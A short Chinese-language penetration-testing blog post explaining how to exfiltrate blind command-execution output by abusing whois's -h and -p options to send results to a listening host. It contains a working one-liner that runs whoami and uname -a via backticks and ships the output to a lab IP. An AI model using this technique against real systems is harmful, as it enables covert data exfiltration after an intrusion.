渗透技巧:巧用whois外带回显命令执行结果

渗透测试 技巧分享 技巧 原创 渗透


在实战过程中,可能会遇到一些复杂的网络情况,导致需要执行的命令没办法看到返回结果,这就给后续渗透带来很大的不便,从twitter中看到一种新型的命令执行结果外带的方法,在这里分享记录一下

先看一下whois命令的使用介绍

[email protected]:~# whois -h
whois: 选项需要一个参数 -- h
用法: whois 【选项】 …… 对象 …… 

-h HOST, --host HOST    连接到服务器 HOST
-p PORT, --port PORT    连接到端口 PORT
-H                      隐藏法律声明 
      --verbose         解释正在做什么 
      --help            显示帮助并退出 
      --version         输出版本信息并退出 

这些标志是由 whois.ript.net 和 RIPE-like 服务器支持的: 
 -l                     寻找有更少具体匹配的一个级别 
-L                     寻找所有更少具体匹配的级别 
-m                   寻找有更加具体匹配的一个级别 
-M                   寻找有更加具体的匹配的所有级别 
-c                     寻找包含 mnt-irt 属性的最小匹配 
-x                     精确匹配 
-b                     return brief IP address ranges with abuse contact
-B                     关闭对象过滤(显示 email 地址) 
-G                    关闭相关联对象的分组 
-d                     返回 DNS 反解授权对象 
-i ATTR[,ATTR]...      对特定的属性( ATTR )进行逆向查询 
-T TYPE[,TYPE]...      只寻找 TYPE 的对象 
-K                      只返回主键 
-r                      关闭联系信息的递归查询 
-R                     强制显示域对象的本地副本,即使 
                         它包含引用 
-a                     一并搜索所有的数据库镜像 
-s SOURCE[,SOURCE]...   从 SOURCE 中搜索数据库镜像 
-g SOURCE:FIRST-LAST   从串行的 FIRST 到 LAST 的 SOURCE 中查找更新 
-t TYPE                 请求 TYPE 对象的模板 
-v TYPE                 请求 TYPE 对象的详细模板 
-q [version|sources|types]   询问制定服务器信息 
[email protected]:~#

仔细点就可以发现whois命令有两个参数可以连接到远程服务器-h-p
那么我们来尝试下利用whois命令外带回显命令执行结果
先在kali中监听一个端口用来接收回显结果

在ubuntu中执行命令

whois -h 192.168.159.132 -p 555 "`whoami&uname -a`"

需要注意:这里使用的是反引号,这样才会在linux的bash环境执行命令,后面的双引号可带可不带

执行后就看到命令的回显结果已经带出到kali中了

新评论

称呼不能为空
邮箱格式不合法
网站格式不合法
内容不能为空